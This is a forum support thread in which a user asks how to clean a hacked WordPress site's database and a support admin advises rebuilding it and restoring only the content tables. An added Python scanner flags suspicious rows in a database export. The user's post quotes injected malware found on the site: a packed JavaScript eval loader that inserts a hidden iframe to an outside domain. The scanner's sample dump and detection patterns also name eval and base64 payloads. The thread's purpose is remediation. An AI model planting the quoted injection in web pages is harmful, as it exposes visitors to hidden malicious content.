Database Clean-up using BPS Pro-Tools


    #12723
    Paul D.
    Participant

    Hi Keymaster Ed !

    I want to inquire about the proper usage of BPS Pro-Tools. Can you add more detailed documentation for all of the tools available there in the future? We encountered a problem with one of my employer’s sites (the employer said she bought BPS Pro, but I have yet to confirm it). The site was suspended (on and off) because of excessive bandwidth usage. She asked me to fix it, so I checked it. I checked it first via the Sucuri online scanner to confirm whether it’s infected or whatnot. Sure enough, it is. It appeared that some of the PHP pages had been “injected” with some HTML code advertising Viagra and other drugs. I checked all PHP pages and found this:

    <script language="javascript">
    eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('document.body.innerHTML="<iframe src=\'http://www.turbil.net/\' frameborder=\'0\' width=\'1%\' height=\'1%\' />";',[],2,'|100'.split('|'),0,{}))
    </script>
    
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1000140969'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s22.cnzz.com/z_stat.php%3Fid%3D1000140969%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>

    I investigated further and found this:

    eval(base64_decode("THIS PART IS TOO LONG I HAVE TO SCROLL DOWN"));

    After searching Google and BPS Pro threads, I tried decoding it using the BPS Pro-Tools Online Base64 Decoder, and after I hit the Decode button, my antivirus blocked this: http://oi41.tinypic.com/1y5mjs.jpg

    So my question is: how can I “sanitize” an exported SQL database from a “compromised”/malwared/hacked CMS? The site was compromised, and I’m not sure to what extent. What I did so far is to export the SQL database, export the XML, and download the gallery folders/images. On a local testing server, I managed to start clean using a fresh CMS core install, import the XML (for site structure), and import the SQL database. I also installed a clean copy of the theme used. Looking back, I pondered that the database I exported and imported may contain “malicious” stuff. So, how can I “sanitize” the database? Through queries? Or any database tool? Can it be done using BPS Pro-Tools? How?

    Thanks!

    #12726
    AITpro Admin
    Keymaster

    UPDATE: BPS Pro 13.3+ and BPS free 2.4+ versions have a malware scanner > BPS MScan Malware Scanner
    You can use the BPS MScan Malware Scanner to detect hacker files or code anywhere under your Hosting Account or database.

    If a website is already hacked then it is much simpler and quicker to backup your existing site files and database, put the site in maintenance mode or take it offline some other way, change all passwords, delete the existing site, reinstall everything brand new and import ONLY your WordPress content database tables into your new WordPress database or if you have a backup of the site and database that you are 100% sure is clean then delete the existing site and restore it from that backup that you are 100% sure is clean.

    http://forum.ait-pro.com/forums/topic/website-is-already-hacked-will-bps-pro-automatically-fix-or-remove-the-hackers-files-and-code/

    Dehacking a website is time consuming even for a seasoned professional so the quicker and simpler method that guarantees the site is 100% clean is to nuke it and do selective restoration of database content tables ONLY.

    Trying to explain and document how to use the Pro-Tools tools that can be used to dehack a website would mean trying to condense a lifetime of knowledge and experience into something simple and easy to understand for the average person. In other words, that would be a very foolish and time-consuming task to try and attempt, and the end result would most likely be a lot of wasted time for everyone involved. The scope of website dehacking (what to look for, must be able to read, understand and write code proficiently, etc.) is simply too great to be condensed into anything that could be usable for the average person.

    #12732
    Paul D.
    Participant

    Actually, I mean whether it’s possible to use BPS Pro-Tools to search the database for “strings” and replace/delete them, and how to do that. That’s all. I may have worded my first post incorrectly.

    #12734
    AITpro Admin
    Keymaster

    UPDATE: BPS Pro 13.3+ and BPS free 2.4+ versions have a malware scanner > BPS MScan Malware Scanner
    You can use the BPS MScan Malware Scanner to detect hacker files or code anywhere under your Hosting Account or database.

    The DB String Finder tool will search for DB strings, but does not have the capability to replace DB strings, and we are not planning on adding that capability. The logic is that once you have found the DB strings you are looking for, you would use a plugin like Adminer or phpMyAdmin directly, since doing DB string replacements could have catastrophic results if done improperly or if a typo was made. A person needs to fully understand DB Table relationships and other things about their DB before choosing to replace DB data in any particular Table. Trying to code the DB String Finder tool to find those DB Table relationships is more effort than the time it is worth. To do something like that it would be better to create an entirely new plugin that focuses specifically on those tasks. Or in other words, it is a project/plugin that we are not planning on doing/creating at this point.
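The two AITpro replies above (restore ONLY the content tables into a fresh install; find the DB strings first, then act on them in Adminer or phpMyAdmin where you can see the table relationships) as one added example. This is not the BPS Pro-Tools DB String Finder or MScan code and not anything from AITpro: it is a small Python scanner over a mysqldump-style export that (1) flags INSERT rows carrying the kinds of indicator seen in the first post, eval(base64_decode(, the packed-JS eval(function(p,a,c,k,e,r) loader, and <script>/<iframe> tags stored in content, and (2) writes out a copy of the dump holding only an allow-list of content tables. The sample dump, the allow-list (wp_posts and its term/meta/comment tables counted as content; wp_options and wp_users rebuilt fresh in the new install) and the indicator list are constructed assumptions, and the parser assumes mysqldump's layout of one INSERT per line. It only reports; it replaces nothing.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "table indicator line_no snippet")

# Constructed mysqldump-style sample (not real data). One statement per line; the wp_posts row
# carries an injected <script> packed-JS loader and the wp_options row an eval(base64_decode()).
SAMPLE_DUMP = """-- MySQL dump (constructed sample)
SET NAMES utf8;
DROP TABLE IF EXISTS `wp_posts`;
CREATE TABLE `wp_posts` (`ID` bigint(20) NOT NULL, `post_content` longtext NOT NULL);
INSERT INTO `wp_posts` VALUES (1,'Welcome to the site'),(2,'Hello <script>eval(function(p,a,c,k,e,r){return p}(\\'x\\'))</script>');
DROP TABLE IF EXISTS `wp_options`;
CREATE TABLE `wp_options` (`option_id` bigint(20) NOT NULL, `option_value` longtext NOT NULL);
INSERT INTO `wp_options` VALUES (1,'<?php eval(base64_decode(\\'QUJDREVG\\')); ?>');
DROP TABLE IF EXISTS `wp_users`;
CREATE TABLE `wp_users` (`ID` bigint(20) NOT NULL, `user_login` varchar(60) NOT NULL);
INSERT INTO `wp_users` VALUES (1,'admin');
"""

# Assumption: these WordPress tables are "content" worth carrying into a fresh install;
# everything else (wp_options, wp_users, plugin tables) is rebuilt new, as the reply advises.
CONTENT_TABLES = {"wp_posts", "wp_postmeta", "wp_terms", "wp_term_taxonomy",
                  "wp_term_relationships", "wp_comments", "wp_commentmeta"}

# Indicators modelled on what the first post found. Detection only: a hit means "look at this
# row in phpMyAdmin/Adminer", not "delete it"; legitimate content can contain <script> too.
INDICATORS = [
    ("php_eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("packed_js", re.compile(r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e", re.I)),
    ("script_tag", re.compile(r"<script\b", re.I)),
    ("iframe_tag", re.compile(r"<iframe\b", re.I)),
]

# Statement starts that name the table they belong to (also matches /*!40000 ALTER TABLE ... */).
TABLE_STMT = re.compile(
    r"\b(?:DROP TABLE IF EXISTS|CREATE TABLE|INSERT INTO|LOCK TABLES|ALTER TABLE)\s+`?(\w+)`?", re.I)
GLOBAL_PREFIXES = ("--", "SET ", "/*!")


def iter_tagged_lines(dump_text):
    """Yield (line_no, table_or_None, line). Statements that name a table carry that table;
    continuation lines (CREATE TABLE columns, UNLOCK TABLES) inherit the most recent table;
    dump header/footer lines (comments, SET, /*! ... */ directives) carry None."""
    current = None
    for no, line in enumerate(dump_text.splitlines(), 1):
        m = TABLE_STMT.search(line)
        if m:
            current = m.group(1)
            yield no, current, line
        elif line.strip() == "" or line.startswith(GLOBAL_PREFIXES):
            yield no, None, line
        else:
            yield no, current, line


def find_indicators(dump_text):
    """Scan every INSERT line for the indicator patterns; return one Finding per match."""
    findings = []
    for no, table, line in iter_tagged_lines(dump_text):
        if not re.match(r"INSERT INTO", line, re.I):
            continue
        for name, pattern in INDICATORS:
            for m in pattern.finditer(line):
                start = max(0, m.start() - 20)
                findings.append(Finding(table, name, no, line[start:m.end() + 20]))
    return findings


def keep_content_tables(dump_text, allow=frozenset(CONTENT_TABLES)):
    """Return a dump containing only header/footer lines and statements for allow-listed tables."""
    kept = [line for _, table, line in iter_tagged_lines(dump_text)
            if table is None or table in allow]
    return "\n".join(kept) + "\n"


def tables_in(dump_text):
    """Sorted list of table names that appear in the dump."""
    return sorted({t for _, t, _ in iter_tagged_lines(dump_text) if t})


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_DUMP):
        print(f"line {f.line_no} table {f.table}: {f.indicator}: ...{f.snippet}...")
    print("tables kept for import:", tables_in(keep_content_tables(SAMPLE_DUMP)))
```

Run the scan against the full export first and review each hit in the DB tool; only the allow-listed output should be imported into the rebuilt site, and then only after the hits in those tables have been dealt with by hand.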

    #12737
    Paul D.
    Participant

    Thanks for the detailed explanation Edward. I will check the link you provided above for things I overlooked/missed doing. As always, BPS Pro support is always enlightening and helpful for us end-users.

    Paul
